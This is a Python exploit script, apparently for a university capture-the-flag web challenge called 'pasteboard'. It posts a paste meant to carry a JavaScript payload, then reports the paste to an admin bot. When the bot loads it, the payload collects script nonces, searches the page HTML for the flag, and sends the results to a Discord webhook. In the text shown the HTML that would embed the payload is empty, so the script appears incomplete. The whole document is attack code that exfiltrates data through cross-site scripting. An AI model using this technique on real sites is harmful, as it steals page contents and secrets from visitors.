import requests
import time
REMOTE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1459424345695715369/Gnx874Rcb7-ZXqQ6VDy-M_nSB-Su9R8KHIkcyj890gv1e60djv89CJbCkyRi-QPc-HvH"
# Search for nonce and flag in ALL script tags
payload = """
setTimeout(() => {
const results = [];
// Find all script tags with nonce
const scripts = document.querySelectorAll('script[nonce]');
results.push(`Found ${scripts.length} scripts with nonce`);
scripts.forEach((s, i) => {
const nonce = s.getAttribute('nonce');
const content = s.textContent.substring(0, 200);
results.push(`Script ${i}: nonce=${nonce}, content=${content}`);
});
// Search entire HTML for flag pattern
const html = document.documentElement.outerHTML;
const flagMatch = html.match(/uoftctf\\{[^}]+\\}/);
results.push(`Flag found: ${flagMatch ? flagMatch[0] : 'NOT FOUND'}`);
// Search for 'uoftctf' occurrences
const uoftctfMatches = html.match(/uoftctf[^\\s<>]{0,50}/gi);
results.push(`Matches: ${uoftctfMatches ? uoftctfMatches.join(' | ') : 'none'}`);
fetch('DISCORD_WEBHOOK', {
method: 'POST',
headers: {'Content-Type':'application/json'},
body: JSON.stringify({content: results.join('\\n')})
});
}, 2000);
""".replace('DISCORD_WEBHOOK', DISCORD_WEBHOOK)
html_content = f"""
"""
print("[*] Creating paste to find nonce and flag...")
resp = requests.post(f"{REMOTE_URL}/note/new", data={"body": html_content}, allow_redirects=False)
if resp.status_code == 302:
note_url = resp.headers['Location']
print(f"[+] Paste created: {REMOTE_URL}{note_url}")
print("[*] Reporting to bot...")
report_resp = requests.post(f"{REMOTE_URL}/report", data={"url": note_url})
print(f"[+] Reported! Check Discord in 30-35 seconds")
else:
print(f"[-] Failed: {resp.status_code}")